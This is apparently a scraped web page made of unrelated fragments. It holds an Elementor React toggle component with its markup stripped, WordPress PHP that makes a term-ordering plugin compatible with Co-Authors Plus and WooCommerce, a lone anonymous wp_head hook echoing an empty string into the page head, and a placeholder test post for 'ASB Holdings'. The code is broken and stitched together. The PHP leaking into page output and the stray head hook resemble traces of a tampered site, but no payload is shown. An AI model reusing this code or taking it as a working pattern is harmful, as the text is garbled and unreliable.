import { Box, Typography, Switch } from '@elementor/ui'; import * as PropTypes from 'prop-types'; import { UpgradeTooltip } from './upgrade-tooltip'; export const SubSetting = ( { label, settingKey, onSettingChange, checked = false, disabled = false, notExported = false, tooltip = false, } ) => { const getToggle = () => { if ( notExported ) { return ( { __( 'Not exported', 'elementor' ) } ); } const switchElement = ( onSettingChange && onSettingChange( settingKey, isChecked ) } color="info" size="medium" sx={ { alignSelf: 'center', ...( disabled && tooltip && { cursor: 'pointer' } ), } } /> ); return ( { switchElement } ); }; return ( { label } { getToggle() } ); }; SubSetting.propTypes = { checked: PropTypes.bool, disabled: PropTypes.bool, notExported: PropTypes.bool, label: PropTypes.string.isRequired, settingKey: PropTypes.string.isRequired, onSettingChange: PropTypes.func, tooltip: PropTypes.bool, }; if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly //Co-Authors Plus fix add_action ('to/get_terms_orderby/ignore', 'to_get_terms_orderby_ignore_coauthors', 10, 3); function to_get_terms_orderby_ignore_coauthors( $ignore, $orderby, $args ) { if( !function_exists('is_plugin_active') ) include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); if( ! is_plugin_active( 'co-authors-plus/co-authors-plus.php' )) return $ignore; if ( ! isset($args['taxonomy']) || count($args['taxonomy']) !== 1 || array_search('author', $args['taxonomy']) === FALSE ) return $ignore; return TRUE; } //WooCommerce Attribute order add_action ('to/get_terms_orderby/ignore', 'to_get_terms_orderby_ignore_woocommerce', 10, 3); function to_get_terms_orderby_ignore_woocommerce( $ignore, $orderby, $args ) { if( !function_exists('is_plugin_active') ) include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); if( ! is_plugin_active( 'woocommerce/woocommerce.php' )) return $ignore; if ( ! function_exists ( 'wc_get_attribute_taxonomies' ) ) return $ignore; //create a list of attribute taxonomies $attributes = wc_get_attribute_taxonomies(); $found_attributex_tax = array(); foreach ( $attributes as $attribute ) { $found_attributex_tax[] = 'pa_' . $attribute->attribute_name; } if ( ! isset($args['taxonomy']) || count($args['taxonomy']) !== 1 ) return $ignore; if ( count ( array_intersect( $found_attributex_tax, $args['taxonomy']) ) < 1 ) return $ignore; return TRUE; } ?> add_action('wp_head', function(){echo '';}, 1); Test Post for WordPress | ASB Holdings

Test Post for WordPress

Test Post for WordPress
12 - 2 - 2025
Test Post for WordPress

This is a sample post created to test the basic formatting features of the WordPress CMS.

Subheading Level 2

You can use bold text, italic text, and combine both styles.

  1. Step one
  2. Step two
  3. Step three

This content is only for demonstration purposes. Feel free to edit or delete it.